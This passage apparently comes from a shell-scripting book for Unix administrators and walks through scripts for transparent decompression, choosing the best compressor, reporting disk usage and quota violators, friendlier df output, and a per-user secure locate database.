  if [ -f "$arg" ] ; then
    case "$arg" in
       *.Z)   $unZ "$arg"
              arg="$(echo $arg | sed 's/\.Z$//')"
              Zlist="$Zlist \"$arg\""
              ;;
       *.gz)  $ungz "$arg"
              arg="$(echo $arg | sed 's/\.gz$//')"
              gzlist="$gzlist \"$arg\""
              ;;
       *.bz2) $unbz "$arg"
              arg="$(echo $arg | sed 's/\.bz2$//')"
              bzlist="$bzlist \"$arg\""
              ;;
    esac
  fi
  newargs="${newargs:-""} \"$arg\""
done

case $0 in
  *zcat*  ) eval cat $newargs  ;;
  *zmore* ) eval more $newargs ;;
  *zgrep* ) eval grep $newargs ;;
  *       ) echo "$0: unknown base name. Can't proceed." >&2 ; exit 1
esac

# now recompress everything

if [ ! -z "$Zlist" ] ; then
  eval $Z $Zlist
fi
if [ ! -z "$gzlist" ] ; then
  eval $gz $gzlist
fi
if [ ! -z "$bzlist" ] ; then
  eval $bz $bzlist
fi

# and done

exit 0

How It Works
For any given suffix, three steps are necessary: uncompress the file, rewrite the filename without the suffix, and add it
to the list of files to recompress at the end of the script. By keeping three separate lists, one for each compression
program, this script also lets you easily grep across files compressed using multiple compression utilities.
The most important trick is the use of the eval directive when recompressing the files. This is necessary to ensure
that filenames with spaces are treated properly. When the Zlist, gzlist, and bzlist variables are instantiated,
each argument is surrounded by quotes, so a typical value might be "sample.c" "test.pl"
"penny.jar". Because the list has levels of quotes, invoking a command like cat $Zlist results in cat
complaining that file "sample.c" wasn't found. To force the shell to act as if the command were typed at a
command line (where the quotes are stripped once they have been utilized for arg parsing), eval is used, and all
works as desired.
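The quoting problem is easy to reproduce in a couple of lines (the filename here is hypothetical):

```sh
# Create a file whose name contains a space, and store it in a list
# variable the same way the script builds Zlist/gzlist/bzlist.
touch "sample file.c"
list="\"sample file.c\""

# Plain expansion would split the value into the words `"sample` and
# `file.c"` (quotes included). With eval, the shell re-parses the line
# and the quotes do their job, so ls sees one filename:
eval ls $list          # lists: sample file.c

rm -f "sample file.c"
```

The same re-parsing is why eval is needed when the script finally runs `eval $gz $gzlist` over the accumulated list.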

Running the Script


To work properly, this script should have three names. How do you do that in Unix? Simple: links. You can use either
symbolic links, which are special files that store the names of link destinations, or hard links, which are actually
assigned the same inode as the linked file. I prefer symbolic links. These can easily be created (here the script is
already called zcat):
$ ln -s zcat zmore
$ ln -s zcat zgrep
Once that's done, you have three new commands that have a shared code base, and each accepts a list of files to
process as needed, uncompressing and then recompressing them when done.

The Results
The standard compress utility quickly shrinks down ragged.txt and gives it a .Z suffix:
$ compress ragged.txt
With ragged.txt in its compressed state, we can view the file with zcat:
$ zcat ragged.txt.Z
So she sat on, with closed eyes, and half believed herself in
Wonderland, though she knew she had but to open them again, and
all would change to dull reality--the grass would be only rustling
in the wind, and the pool rippling to the waving of the reeds--the
rattling teacups would change to tinkling sheep-bells, and the
Queen's shrill cries to the voice of the shepherd boy--and the
sneeze of the baby, the shriek of the Gryphon, and all the other
queer noises, would change (she knew) to the confused clamour of
the busy farm-yard--while the lowing of the cattle in the distance
would take the place of the Mock Turtle's heavy sobs.
And then search for "teacup" again:
$ zgrep teacup ragged.txt.Z
rattling teacups would change to tinkling sheep-bells, and the
All the while, the file starts and ends in its original compressed state:
$ ls -l ragged.txt*
-rw-r--r--  1 taylor  staff  443 Jul  7 16:07 ragged.txt.Z

Hacking the Script


Probably the biggest weakness of this script is that if it is canceled in midstream, the file isn't guaranteed to recompress.
This can be fixed with a smart use of the trap capability and a recompress function that does error checking. That
would be a nice addition.
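One possible shape for that fix (a sketch of my own, not the book's code): register a recompress handler with trap on EXIT, HUP, and INT before uncompressing anything, so even an interrupted run restores the files it touched. The demo file below is hypothetical:

```sh
# The subshell stands in for the script body; the trap fires when it
# exits for any reason, including an interrupt.
(
  trap 'eval gzip -f $gzlist' EXIT HUP INT   # recompress on the way out
  gzlist=""
  echo "sample data" > /tmp/rcdemo.txt
  gzip -f /tmp/rcdemo.txt                    # file arrives compressed...
  gunzip /tmp/rcdemo.txt.gz                  # ...uncompressed to work on it
  gzlist="$gzlist \"/tmp/rcdemo.txt\""
  # ... process the plain file here; a Ctrl-C now still fires the trap
)
ls /tmp/rcdemo.txt.gz                        # recompressed by the trap
```

A production version would add one handler per compression tool and check each tool's exit status before declaring the file restored.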

#38 Ensuring Maximally Compressed Files


As highlighted in Script #37, most Unix implementations include more than one compression method, but the onus is on
the user to figure out which does the best job of compressing a given file. What typically happens is that users learn
how to work with just one compression program without ever knowing that they could attain better results with a
different one. Making this more confusing is that some files compress better with one algorithm and some with another,
and there's no way to know without experimentation.
The logical solution is to have a script that compresses files using each of the tools and then selects the smallest
resultant file as the best. That's exactly what bestcompress does. By the way, this is one of my favorite scripts in
the book.

The Code
#!/bin/sh

# bestcompress - Given a file, tries compressing it with all the available
#   compression tools and keeps the compressed file that's smallest, reporting
#   the result to the user. If '-a' isn't specified, bestcompress skips
#   compressed files in the input stream.

Z="compress" ; gz="gzip" ; bz="bzip2"
Zout="/tmp/bestcompress.$$.Z"
gzout="/tmp/bestcompress.$$.gz"
bzout="/tmp/bestcompress.$$.bz"
skipcompressed=1

if [ "$1" = "-a" ] ; then
  skipcompressed=0 ; shift
fi

if [ $# -eq 0 ] ; then
  echo "Usage: $0 [-a] file or files to optimally compress" >&2 ; exit 1
fi

trap "/bin/rm -f $Zout $gzout $bzout" EXIT

for name
do
  if [ ! -f "$name" ] ; then
    echo "$0: file $name not found. Skipped." >&2
    continue
  fi

  if [ "$(echo $name | egrep '(\.Z$|\.gz$|\.bz2$)')" != "" ] ; then
    if [ $skipcompressed -eq 1 ] ; then
      echo "Skipped file ${name}: it's already compressed."
      continue
    else
      echo "Warning: Trying to double-compress $name"
    fi
  fi

  $Z  < "$name" > $Zout  &
  $gz < "$name" > $gzout &
  $bz < "$name" > $bzout &

  wait  # run compressions in parallel for speed. Wait until all are done

  smallest="$(ls -l "$name" $Zout $gzout $bzout | \
    awk '{print $5"="NR}' | sort -n | cut -d= -f2 | head -1)"

  case "$smallest" in
     1 ) echo "No space savings by compressing $name. Left as is."
         ;;
     2 ) echo Best compression is with compress. File renamed ${name}.Z
         mv $Zout "${name}.Z" ; rm -f "$name"
         ;;
     3 ) echo Best compression is with gzip. File renamed ${name}.gz
         mv $gzout "${name}.gz" ; rm -f "$name"
         ;;
     4 ) echo Best compression is with bzip2. File renamed ${name}.bz2
         mv $bzout "${name}.bz2" ; rm -f "$name"
  esac
done

exit 0

How It Works
The most interesting line in this script is
smallest="$(ls -l "$name" $Zout $gzout $bzout | \
  awk '{print $5"="NR}' | sort -n | cut -d= -f2 | head -1)"
This line has ls output the size of each file (the original and the three compressed files, in a known order), chops out
just the file sizes with awk, sorts these numerically, and ends up with the line number of the smallest resultant file. If
the compressed versions are all bigger than the original file, the result is 1, and an appropriate message is output.
Otherwise, smallest will indicate which of compress, gzip, or bzip2 did the best job. Then it's just a matter of
moving the appropriate file into the current directory and removing the original file.
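To see the selection pipeline in isolation, here it is run against a few fabricated ls -l lines (sizes and filenames invented for illustration). Each size is paired with its line number, the pairs are sorted numerically by size, and the line number of the winner pops out:

```sh
# Field 5 of ls -l is the file size; NR is the line number. With the
# smallest size at 60630 on line 4, the pipeline emits "4".
printf '%s\n' \
  '-rw-r--r-- 1 u g 154872 Dec 4 file' \
  '-rw-r--r-- 1 u g 66287 Dec 4 file.Z' \
  '-rw-r--r-- 1 u g 72043 Dec 4 file.gz' \
  '-rw-r--r-- 1 u g 60630 Dec 4 file.bz2' |
  awk '{print $5"="NR}' | sort -n | cut -d= -f2 | head -1   # prints 4
```

With those sizes, line 4 (the .bz2 file) wins, matching case branch 4 in the script.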
Another technique in this script is worth pointing out:
$Z  < "$name" > $Zout  &
$gz < "$name" > $gzout &
$bz < "$name" > $bzout &
wait

The three compression calls are done in parallel by using the trailing & to drop each of them into its own subshell,
followed by the call to wait, which stops the script until all the calls are completed. On a uniprocessor, this might not
offer much performance benefit, but with multiple processors, it should spread the task out and complete quite a bit
faster.
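The pattern is easy to see with a trivial stand-in: three one-second sleeps run concurrently, so the whole block finishes in about one second rather than three:

```sh
# Each sleep runs in the background; wait blocks until all have exited.
sleep 1 &
sleep 1 &
sleep 1 &
wait
echo "all three background jobs are done"   # reached after ~1 second
```

Substitute the three compression commands for the sleeps and you have exactly the structure bestcompress uses.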

Running the Script


This script should be invoked with a list of filenames to compress. If some of them are already compressed and you
desire to compress them further, use the -a flag; otherwise they'll be skipped.

The Results
The best way to demonstrate this script is with a file that needs to be compressed:
$ ls -l alice.txt
-rw-r--r--  1 taylor  staff  154872 Dec  4  2002 alice.txt
The script hides the process of compressing the file with each of the three compression tools and instead simply
displays the results:
$ bestcompress alice.txt
Best compression is with compress. File renamed alice.txt.Z
You can see that the file is now quite a bit shorter:
$ ls -l alice.txt.Z
-rw-r--r--  1 taylor  wheel  66287 Jul  7 17:31 alice.txt.Z

Chapter 5: System Administration: Managing Users


Overview
No sophisticated operating system can run itself without some human intervention, whether it's Windows, Mac OS, or
Unix. If you use a multiuser Unix system, someone no doubt is performing the necessary system administration tasks.
You might be able to ignore the proverbial "man behind the curtain" who is managing and maintaining everything, or
you might well be the All Powerful Oz yourself, the person who pulls the levers and pushes the buttons to keep the
system running. Even if you have a single-user system, like a Linux or Mac OS X system, there are system
administration tasks that you should be performing, whether you realize it or not.
Fortunately, streamlining life for Unix system administrators is one of the most common uses of shell scripting, and as a
result there are quite a few different shell scripts that sysadmins use, from the simple to the complex. In fact, there are
usually quite a few commands in Unix that are actually shell scripts, and many of the most basic tasks, like adding
users, analyzing disk usage, and managing the filespace of the guest account, can easily be done in relatively short
scripts.
What's surprising is that many system administration scripts are no more than 20 to 30 lines long, total. This can be
easily calculated on the command line for a given directory:
$ wc -l $(file /usr/bin/* | grep "script" | grep -v perl | cut -d: -f1) | \
  sort -n | head -15
  3 /usr/bin/bdftops
  3 /usr/bin/font2c
  3 /usr/bin/gsbj
  3 /usr/bin/gsdj
  3 /usr/bin/gsdj500
  3 /usr/bin/gslj
  3 /usr/bin/gslp
  3 /usr/bin/gsnd
  4 /usr/bin/4odb
  4 /usr/bin/4xslt
  4 /usr/bin/krdb
  5 /usr/bin/4rdf
  5 /usr/bin/4xupdate
  6 /usr/bin/checkXML
  6 /usr/bin/kdb2html
None of the shortest 15 scripts in the /usr/bin/ directory are longer than 6 lines. And at 14 lines, the Red Hat
Linux 9.0 script /usr/bin/mute is a fine example of how a little shell script can really improve the user experience:
#!/bin/sh
# $Aumix: aumix/src/mute,v 1.1 2002/03/19 01:09:18 trevor Exp $
# Copyright (c) 2001, Ben Ford and Trevor Johnson
#
# Run this script to mute, then again to un-mute.
# Note: it will clobber your saved settings.
#
volumes=$(aumix -vq | tr -d ,)
if [ $(echo $volumes | awk '{print $2}') -ne 0 -o \
     $(echo $volumes | awk '{print $3}') -ne 0 ]; then
  aumix -S -v 0
else
  aumix -L > /dev/null
fi
Like the mute script, the scripts presented in this chapter are short and useful, offering a range of administrative
capabilities, including easy system backups, showing what system services are enabled through both inetd and
xinetd, an easy front end to the date command for changing the current date and time, and a helpful tool to
validate crontab files.

#39 Analyzing Disk Usage


Even with the advent of very large disks and their continual drop in price, system administrators seem to perpetually be
tasked with keeping an eye on disk usage to ensure that the system doesn't fill up.
The most common monitoring technique is to look at the /users or /home directory, using the du command to
ascertain the disk usage of all the subdirectories, and then reporting the top five or ten users therein. The problem with
this approach, however, is that it doesn't take into account space usage elsewhere on the hard disk(s). If you have
some users who have additional archive space on a second drive, or sneaky types who keep MPEGs in a dot directory
in /tmp or in an unused and accidentally opened directory in the ftp area, they'll escape detection. Also, if you have
home directories spread across multiple devices (e.g., disks), searching each /home isn't necessarily optimal.
Instead, a better solution is to get all the account names directly from the /etc/passwd file and then to search the
file systems for files owned by each account, as shown in this script.

The Code
#!/bin/sh

# fquota - Disk quota analysis tool for Unix.
#   Assumes that all user accounts are >= UID 100.

MAXDISKUSAGE=20

for name in $(cut -d: -f1,3 /etc/passwd | awk -F: '$2 > 99 {print $1}')
do
  echo -n "User $name exceeds disk quota. Disk usage is: "

  # You might need to modify the following list of directories to match
  # the layout of your disk. Most likely change: /Users to /home

  find / /usr /var /Users -user $name -xdev -type f -ls | \
    awk '{ sum += $7 } END { print sum / (1024*1024) " Mbytes" }'

done | awk "\$9 > $MAXDISKUSAGE { print \$0 }"

exit 0

How It Works
By convention, uids 1 through 99 are for system daemons and administrative tasks, while 100 and above are for user
accounts. Unix administrators tend to be a fairly organized bunch, and this script takes advantage of that, skipping all
accounts that have a uid of less than 100.
The -xdev argument to the find command ensures that find doesn't go through all file systems, preventing it from
slogging through system areas, read-only source directories, removable devices, the /proc directory of running
processes (on Linux), and similar areas.
It may seem at first glance that this script outputs an exceeds disk quota message for each and every account, but the
awk statement after the loop allows reporting of this message only for accounts with usage greater than the predefined
MAXDISKUSAGE.
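You can watch that filter work in isolation by feeding it a couple of fabricated report lines. Field 9 of each line is the megabyte figure, so only accounts over the threshold survive:

```sh
# With MAXDISKUSAGE=20, the awk filter keeps linda (39.7) and drops
# mike (4.2); field 9 is the number after "is:".
printf '%s\n' \
  'User linda exceeds disk quota. Disk usage is: 39.7 Mbytes' \
  'User mike exceeds disk quota. Disk usage is: 4.2 Mbytes' |
  awk '$9 > 20 { print $0 }'
```

Only linda's line is printed, which is exactly how the loop can emit a message for every account yet report only the violators.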

Running the Script


This script has no arguments and should be run as root to ensure access to all directories and file systems. The
smart way to do this is by using the helpful sudo command (see man sudo for more details). Why is sudo helpful?
Because it allows you to execute one command as root, after which you are back to being a regular user. Each time
you want to run an administrative command, you have to consciously use sudo to do so; using su - root, by
contrast, makes you root for all subsequent commands until you exit the subshell, and when you get distracted it's all
too easy to forget you are root and then type a command that can lead to disaster.
Note You will likely have to modify the directories listed in the find command to match the corresponding
directories in your own disk topography.

The Results

Because it's searching across file systems, it should be no surprise that this script takes rather a while to run. On a
large system it could easily take somewhere between a cup of tea and a lunch with your significant other. Here are the
results:
$ sudo fquota
User linda exceeds disk quota. Disk usage is: 39.7 Mbytes
User taylor exceeds disk quota. Disk usage is: 21799.4 Mbytes
You can see that taylor is way out of control with his disk usage! That's 21GB. Sheesh.

Hacking the Script


A complete script of this nature should have some sort of automated email capability to warn the scofflaws that they're
hogging disk space. This enhancement is demonstrated in the very next script.

#40 Reporting Disk Hogs


Most system administrators seek the easiest way to solve a problem, and the easiest way to manage disk quotas is to
extend the fquota script, Script #39, to include the ability to email warnings directly to users who are consuming too
much space.

The Code
#!/bin/sh

# diskhogs - Disk quota analysis tool for Unix; assumes all user
#   accounts are >= UID 100. Emails message to each violating user
#   and reports a summary to the screen.

MAXDISKUSAGE=20
violators="/tmp/diskhogs0.$$"

trap "/bin/rm -f $violators" 0

for name in $(cut -d: -f1,3 /etc/passwd | awk -F: '$2 > 99 {print $1}')
do
  echo -n "$name "

  # You might need to modify the following list of directories to match
  # the layout of your disk. Most likely change: /Users to /home

  find / /usr /var /Users -user $name -xdev -type f -ls | \
    awk '{ sum += $7 } END { print sum / (1024*1024) }'

done | awk "\$2 > $MAXDISKUSAGE { print \$0 }" > $violators

if [ ! -s $violators ] ; then
  echo "No users exceed the disk quota of ${MAXDISKUSAGE}MB"
  cat $violators
  exit 0
fi

while read account usage ; do

  cat << EOF | fmt | mail -s "Warning: $account Exceeds Quota" $account
Your disk usage is ${usage}MB, but you have been allocated only
${MAXDISKUSAGE}MB. This means that you need to either delete some of
your files, compress your files (see 'gzip' or 'bzip2' for powerful and
easy-to-use compression programs), or talk with us about increasing
your disk allocation.

Thanks for your cooperation in this matter.

Dave Taylor @ x554
EOF

  echo "Account $account has $usage MB of disk space. User notified."

done < $violators

exit 0

How It Works
Note the addition of the fmt command in the email pipeline:
cat << EOF | fmt | mail -s "Warning: $account Exceeds Quota" $account
It's a handy trick to improve the appearance of automatically generated email when fields of unknown length, like
$account, are embedded in the text. The logic of the for loop in this script is slightly different from the logic of the
for loop in Script #39, fquota. Because the output of the loop in this script is intended purely for the second part of
the script, during each cycle it simply reports the account name and disk usage rather than a disk quota exceeded
error message.
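As a quick illustration of the fmt trick (the message text is abbreviated), a single long line with interpolated values comes out reflowed to a tidy width:

```sh
# fmt refills ragged or over-long lines to a target width; -w 60 is
# used here just to make the effect obvious on a short sample.
usage="21799.5"
printf 'Your disk usage is %sMB, but you have been allocated only 20MB. This means that you need to either delete some of your files or talk with us.\n' "$usage" | fmt -w 60
```

However long $usage happens to be, the reader sees evenly wrapped paragraphs rather than one line that wraps wherever the terminal decides.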

Running the Script


Like Script #39, this script has no starting arguments and should be run as root for accurate results. This can most
safely be accomplished by using the sudo command.

The Results
$ sudo diskhogs
Account linda has 39.7 MB of disk space. User notified.
Account taylor has 21799.5 MB of disk space. User notified.
If we now peek into the linda account mailbox, we'll see that a message from the script has been delivered:
Subject: Warning: linda Exceeds Quota

Your disk usage is 39.7MB, but you have been allocated only 20MB. This means
that you need to either delete some of your files, compress your files (see
'gzip' or 'bzip2' for powerful and easy-to-use compression programs), or talk
with us about increasing your disk allocation.

Thanks for your cooperation in this matter.

Dave Taylor @ x554

Hacking the Script


A useful refinement to this script would be to allow certain users to have larger quotas than others. This could easily be
accomplished by creating a separate file that defines the disk quota for each user and by declaring in the script a
default quota for users not appearing in the file. A file with account name and quota pairs can be scanned with grep
and the second field extracted with a call to cut -f2.
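A sketch of that lookup (the quotas file name and its space-separated account/limit format are assumptions, not from the book):

```sh
# Hypothetical quotas file: one "account limit-in-MB" pair per line.
quotasfile="/tmp/quotas.demo"
printf 'taylor 100\nlinda 50\n' > "$quotasfile"

MAXDISKUSAGE=20                 # default for accounts not in the file
account="linda"

# grep anchors on the account name; cut pulls the second field. The
# ${var:-default} expansion supplies the fallback for unlisted users.
limit="$(grep "^${account} " "$quotasfile" | cut -d' ' -f2)"
limit="${limit:-$MAXDISKUSAGE}"

echo "quota for $account is ${limit}MB"     # prints: quota for linda is 50MB
rm -f "$quotasfile"
```

The book's cut -f2 assumes tab-separated fields; with spaces as above you need cut -d' ' -f2, so pick one delimiter and stick to it.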

#41 Figuring Out Available Disk Space


Related to disk quota management is the simpler question of how much disk space is available on the system. The df
command reports disk usage on a per-disk basis, but the output can be a bit baffling:
$ df
Filesystem           1K-blocks     Used Available Use% Mounted on
/dev/hdb2             25695892  1871048  22519564   8% /
/dev/hdb1               101089     6218     89652   7% /boot
none                    127744        0    127744   0% /dev/shm
What would be much more useful is a version of df that summarizes the available capacity values in column four and
then presents the summary in a way that is easily understood. It's a task easily accomplished in a script.

The Code
#!/bin/sh

# diskspace - Summarizes available disk space and presents it in a logical
#   and readable fashion.

tempfile="/tmp/available.$$"

trap "rm -f $tempfile" EXIT

cat << 'EOF' > $tempfile
    { sum += $4 }
END { mb = sum / 1024
      gb = mb / 1024
      printf "%.0f MB (%.2fGB) of available disk space\n", mb, gb
    }
EOF

df -k | awk -f $tempfile

exit 0

Running the Script


This script can be run as any user and produces a succinct one-line summary of available disk space.

The Results
On the same system on which the df output shown earlier was generated, the script reports the following:
$ diskspace
96199 MB (93.94GB) of available disk space

Hacking the Script


If your system has lots of disk space across many multigigabyte drives, you might even expand this script to
automatically return values in terabytes as needed. If you're just out of space, it'll doubtless be discouraging to see
0.03GB of available disk space, but that's a good incentive to use diskhogs (Script #40) and clean things up, right?
Another issue to consider is whether it's more useful to know about the available disk space on all devices, including
those partitions that cannot grow (like /boot), or whether reporting on user volumes is sufficient. If the latter is the
case, you can improve this script by making a call to grep immediately after the df call. Use grep with the desired
device names to include only particular devices, or use grep -v followed by the unwanted device names to screen
out devices you don't want included.
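Here is that filtering in a self-contained form, using fabricated df -k lines so the effect is visible: grep -v drops the /boot partition before awk sums the available-space column:

```sh
# Simulated df -k output (two real partitions plus the header). The
# header's non-numeric field 4 contributes 0 to the awk sum, just as
# it does in the real script.
printf '%s\n' \
  'Filesystem 1K-blocks Used Available Use% Mounted' \
  '/dev/hdb2 25695892 1871048 22519564 8% /' \
  '/dev/hdb1 101089 6218 89652 7% /boot' |
  grep -v '/boot' |
  awk '{ sum += $4 } END { printf "%.0f MB available\n", sum/1024 }'
# prints: 21992 MB available
```

In the script itself you'd insert the grep -v between `df -k` and `awk -f $tempfile`; on a live system the device names to exclude are, of course, your own.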

#42 Improving the Readability of df Output


While Script #41 summarized df command output, the most important change we can make to df is simply to improve
the readability of its output.

The Code
#!/bin/sh

# newdf - A friendlier version of df.

awkscript="/tmp/newdf.$$"

trap "rm -f $awkscript" EXIT

cat << 'EOF' > $awkscript
function showunit(size)
{ mb = size / 1024; prettymb=(int(mb * 100)) / 100;
  gb = mb / 1024;   prettygb=(int(gb * 100)) / 100;

  if ( substr(size,1,1) !~ "[0-9]" ||
       substr(size,2,1) !~ "[0-9]" ) { return size }
  else if ( mb < 1) { return size "K" }
  else if ( gb < 1) { return prettymb "M" }
  else              { return prettygb "G" }
}

BEGIN {
  printf "%-27s %7s %7s %7s %8s %-s\n",
        "Filesystem", "Size", "Used", "Avail", "Capacity", "Mounted"
}
!/Filesystem/ {

  size=showunit($2);
  used=showunit($3);
  avail=showunit($4);

  printf "%-27s %7s %7s %7s %8s %-s\n",
        $1, size, used, avail, $5, $6
}
EOF

df -k | awk -f $awkscript

exit 0

How It Works
Much of the work in this script takes place within an awk script, and it wouldn't be too much of a step to write the
entire script in awk rather than in the shell, using the system() function to call df directly. This script would be an
ideal candidate to rewrite in Perl, but that's outside the scope of this book.
There's also a trick in this script that comes from my early days of programming in BASIC, of all things:
prettymb=(int(mb * 100)) / 100;
When working with arbitrary-precision numeric values, a quick way to limit the number of fractional digits is to multiply
the value by a power of 10, convert it to an integer (which drops the fractional portion), and then divide it back by the
same power of 10. In this case, a value like 7.085344324 is turned into the much more attractive 7.08.
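The trick is easy to verify in isolation with a one-liner:

```sh
# Scale up by 100, drop the fraction with int(), scale back down:
# 7.085344324 -> 708.53... -> 708 -> 7.08
awk 'BEGIN { mb = 7.085344324; print (int(mb * 100)) / 100 }'   # prints 7.08
```

Note that this truncates rather than rounds; for true rounding you'd add 0.5 before the int() call.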
Note Some versions of df have an -h flag that offers an output format similar to this script's output format.
However, as with many of the scripts in this book, this one will let you achieve friendly and more meaningful
output on every Unix or Linux system, regardless of what version of df is present.

Running the Script


This script has no arguments and can be run by anyone, r o o t or otherwise. To eliminate reporting space usage on
devices that you aren't interested in, use gr ep -v after the call to df .

The Results
Regular df reports are difficult to understand:
$ df
Filesystem            512-blocks     Used     Avail Capacity  Mounted on
/dev/disk1s9            78157200 43187712  34457488    55%    /
devfs                        196      196         0   100%    /dev
fdesc                          2        2         0   100%    /dev
<volfs>                     1024     1024         0   100%    /.vol
/dev/disk0s9           234419552 71863152 162556416    30%    /Volumes/110GB
The new script exploits awk to improve readability:
$ newdf
Filesystem                     Size    Used   Avail Capacity  Mounted
/dev/disk1s9                 37.26G  20.59G  16.43G      55%  /
devfs                           98K     98K       0     100%  /dev
fdesc                             1       1       0     100%  /dev
<volfs>                        512K    512K       0     100%  /.vol
/dev/disk0s9                111.77G  34.26G  77.51G      30%  /Volumes/110GB

#43 Implementing a Secure Locate


The locate script presented as Script #19 is useful but has a security problem: If the build process is run as root,
it builds a list of all files and directories on the entire system, regardless of owner, allowing users to see directories
and filenames that they wouldn't otherwise have permission to access. The build process can be run as a generic user
(as Mac OS X does, running mklocatedb as user nobody), but that's not right either, because as a user I want to
be able to locate file matches anywhere in my directory tree, regardless of whether user nobody can see them.
One way to solve this dilemma is to increase the data saved in the locate database so that each entry has an
owner, group, and permissions string attached, but then the mklocatedb database itself remains insecure unless the
locate script is run as either a setuid or setgid script, and that's something to be avoided at all cost.
A compromise is to have a separate .slocatedb database for each user. This isn't as bad as it sounds, because a
personal database is needed only for users who actually use the locate command. Once invoked, the system creates a
.slocatedb file in the user's home directory, and a cron job can update existing .slocatedb files nightly to keep
them in sync. The very first time someone runs the secure slocate script, it outputs a message warning them that
they may see only matches for files that are publicly accessible. Starting the very next day (depending on the cron
schedule) the users get their personalized results.

The Code
Two scripts are necessary for a secure locate: the database builder, mkslocatedb, and the actual locate search
utility, slocate:
#!/bin/sh

# mkslocatedb - Builds the central, public locate database as user nobody,
#   and simultaneously steps through each user's home directory to find those
#   that contain an .slocatedb file. If found, an additional, private
#   version of the locate database will be created for that user.

locatedb="/var/locate.db"
slocatedb=".slocatedb"

if [ "$(whoami)" != "root" ] ; then
  echo "$0: Error: You must be root to run this command." >&2
  exit 1
fi

if [ "$(grep '^nobody:' /etc/passwd)" = "" ] ; then
  echo "$0: Error: you must have an account for user 'nobody'" >&2
  echo "to create the default slocate database." >&2 ; exit 1
fi

cd /          # sidestep post-su pwd permission problems

# First, create or update the public database

su -fm nobody -c "find / -print" > $locatedb 2>/dev/null

echo "building default slocate database (user = nobody)"
echo ... result is $(wc -l < $locatedb) lines long.

# Now step through the user accounts on the system to see who has
# a $slocatedb file in their home directory....

for account in $(cut -d: -f1 /etc/passwd)
do
  homedir="$(grep "^${account}:" /etc/passwd | cut -d: -f6)"
  if [ "$homedir" = "/" ] ; then
    continue    # refuse to build one for root dir
  elif [ -e $homedir/$slocatedb ] ; then
    echo "building slocate database for user $account"
    su -fm $account -c "find / -print" > $homedir/$slocatedb \
       2>/dev/null
    chmod 600 $homedir/$slocatedb
    chown $account $homedir/$slocatedb
    echo ... result is $(wc -l < $homedir/$slocatedb) lines long.
  fi
done

exit 0
The slocate script itself is the user interface to the slocate database:
#!/bin/sh

# slocate - Tries to search the user's own secure slocatedb database for the
#   specified pattern. If no database exists, outputs a warning and creates
#   one. If personal slocatedb is empty, uses system one instead.

locatedb="/var/locate.db"
slocatedb="$HOME/.slocatedb"

if [ ! -e $slocatedb -o "$1" = "--explain" ] ; then
  cat << "EOF" >&2
Warning: Secure locate keeps a private database for each user, and your
database hasn't yet been created. Until it is (probably late tonight)
I'll just use the public locate database, which will show you all
publicly accessible matches, rather than those explicitly available to
account ${USER:-$LOGNAME}.
EOF
  if [ "$1" = "--explain" ] ; then
    exit 0
  fi

  # Before we go, create a .slocatedb so that cron will fill it
  # the next time the mkslocatedb script is run

  touch $slocatedb      # mkslocatedb will build it next time through
  chmod 600 $slocatedb  # start on the right foot with permissions

elif [ -s $slocatedb ] ; then
  locatedb=$slocatedb
else
  echo "Warning: using public database. Use \"$0 --explain\" for details." >&2
fi

if [ -z "$1" ] ; then
  echo "Usage: $0 pattern" >&2 ; exit 1
fi

exec grep -i "$1" $locatedb

How It Works
The mkslocatedb script revolves around the idea that the root user can temporarily become another user ID by
using su -fm user, and so can run find on the file system of each user in order to create a user-specific
database of filenames. Working with the su command proves tricky within this script, though, because by
default su not only wants to change the effective user ID but also wants to import the environment of the specified
account. The end result is odd and confusing error messages on just about any Unix unless the -m flag is specified,
which prevents the user environment from being imported. The -f flag is extra insurance, bypassing the .cshrc file
for any csh or tcsh users.
The other unusual notation in mkslocatedb is 2>/dev/null, which routes all error messages directly to the
proverbial bit bucket: Anything redirected to /dev/null vanishes without a trace. It's an easy way to skip the
inevitable flood of permission denied error messages for each find invocation.
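The effect of this redirection is easy to see in isolation. A minimal sketch (the path is deliberately nonexistent):

```shell
# The error message from the failing ls is discarded by 2>/dev/null,
# while normal execution continues unaffected.
ls /no/such/directory 2>/dev/null   # complaint silently vanishes
echo "still running"                # the script carries on
```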

Running the Scripts


The mkslocatedb script is very unusual in that not only must it be run as root, but using sudo won't cut it. You
need to either log in as root or use the more powerful su command to become root before running the script. The
slocate script, of course, has no such requirements.

The Results
Building the slocate database for both nobody (the public database) and user taylor on a Red Hat Linux 10.0
box produces the following output:
# mkslocatedb
building default slocate database (user = nobody)
... result is 99809 lines long.
building slocate database for user taylor
... result is 99808 lines long.
The same command run on a pretty full Mac OS X box, for comparison, produces the following:
# mkslocatedb
building default slocate database (user = nobody)
... result is 240160 lines long.
building slocate database for user taylor
... result is 263862 lines long.
To search for a particular file or set of files that match a given pattern, let's first try it as user tintin (who doesn't
have an .slocatedb file):
tintin $ slocate Taylor-Self-Assess.doc
Warning: using public database. Use "slocate --explain" for details.
$
Now we'll enter the same command but as user taylor (who owns the file being sought):
taylor $ slocate Taylor-Self-Assess.doc
/Users/taylor/Documents/Merrick/Taylor-Self-Assess.doc

Hacking the Script


If you have a very large file system, it's possible that this approach will consume a nontrivial amount of space. One way
to address this issue would be to make sure that the individual .slocatedb database files don't contain entries for
files that also appear in the central public database. This requires a bit more processing up front (sort both, and then
use diff), but it could pay off in terms of saved space.
Another technique aimed at saving space would be to build the individual .slocatedb files with references only to
files that have been accessed since the last update. This would work better if the mkslocatedb script was run
weekly rather than daily; otherwise each Monday all users would be back to ground zero, because they're unlikely to
have run the slocate command over the weekend.
Finally, another easy way to save space would be to keep the .slocatedb files compressed and uncompress them
on the fly when they are searched with slocate. See the zgrep command in Script #37 for inspiration regarding
how this technique might be utilized.

#44 Adding Users to the System


If you're responsible for managing a network of Unix or Linux systems, you've already experienced the frustration
caused by subtle incompatibilities among the different operating systems in your dominion. Some of the most basic
administration tasks prove to be the most incompatible across different flavors of Unix, and chief among these tasks is
user account management. Rather than have a single command-line interface that is 100 percent consistent across all
Unix flavors, each vendor has developed its own graphical interface for working with the peculiarities and quirks of its
own Unix.
The Simple Network Management Protocol (SNMP) was, ostensibly, supposed to help normalize this sort of thing, but
managing user accounts is just as difficult now as it was a decade ago, particularly in a heterogeneous computing
environment. As a result, a very helpful set of scripts for a system administrator includes a version of adduser,
deleteuser, and suspenduser that can be customized for your specific needs and then easily ported to all your
Unix systems.
Mac OS X is the odd OS out!

Mac OS X is an exception to this rule, with its reliance on an
account database called NetInfo. Versions of these tools for
Mac OS X are presented in Chapter 11.

On a Unix system, an account is created by adding a unique entry to the /etc/passwd file, an entry consisting of
